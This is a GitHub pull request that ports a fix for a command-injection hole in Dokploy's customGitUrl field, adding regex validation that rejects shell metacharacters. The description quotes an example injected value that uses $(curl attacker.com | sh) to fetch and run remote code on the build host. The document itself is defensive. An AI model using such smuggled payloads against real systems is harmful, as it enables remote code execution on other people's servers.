fix: validate customGitUrl to prevent command injection#66
Merged
Conversation
…bstitution The customGitUrl field was only validated with z.string().optional() — no shell-metacharacter restriction. An authenticated user could inject arbitrary shell commands via command substitution, e.g.: customGitUrl: "https://github.com/x.git$(curl attacker.com | sh)" The $(...) is expanded by the shell before git clone runs, executing the injected command on the build host (local or remote SSH). customGitBranch is already protected by VALID_BRANCH_REGEX; this adds equivalent validation for customGitUrl via VALID_GIT_URL_REGEX which accepts standard HTTPS and SSH Git URLs while rejecting shell metacharacters ($, `, ;, |, &, etc.). See SECURITY-AUDIT.md for full details. (cherry picked from commit 5a3c1b1)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Ports Dokploy#4676 by @gsmatheus (1 commit, cherry-picked with
-x, original authorship preserved).Vulnerability class
The custom Git provider's repository URL is user-controlled and ultimately reaches shell-executed git commands. Because it was accepted without validation, values containing shell metacharacters / command-substitution sequences could be smuggled into those commands.
Fix
packages/server/src/utils/git-url-validation.ts: allowlist-style regexes for HTTPS (http(s)://…) and SSH (git@host:path,ssh://git@host[:port]:path) clone-URL shapes that reject shell metacharacters ($, backticks,;,|,&, redirects, quotes, whitespace, brackets).apiSaveGitProvider(zod schema inpackages/server/src/db/schema/application.ts) now requirescustomGitUrlto be non-empty and match those patterns ("Invalid Git URL").No drizzle table/column change — this touches only the zod API schema, so no migration is involved. The fork's
application.saveGitProviderrouter endpoint consumesapiSaveGitProvider, so the validation is effective on the same path as upstream.Adaptations
None — applied cleanly onto fork canary (fork's
apiSaveGitProviderblock matches upstream).Test evidence
pnpm --filter=@dokploy/server run typecheckandpnpm --filter=dokploy run typecheck: both clean.customGitUrlonly set it on mock entities (not via the API schema) and use valid HTTPS URLs where it matters — no test-surface impact.Overlap notes
No file overlap with open fork PRs #36/#58 or with the other salvo-2 M2 ports.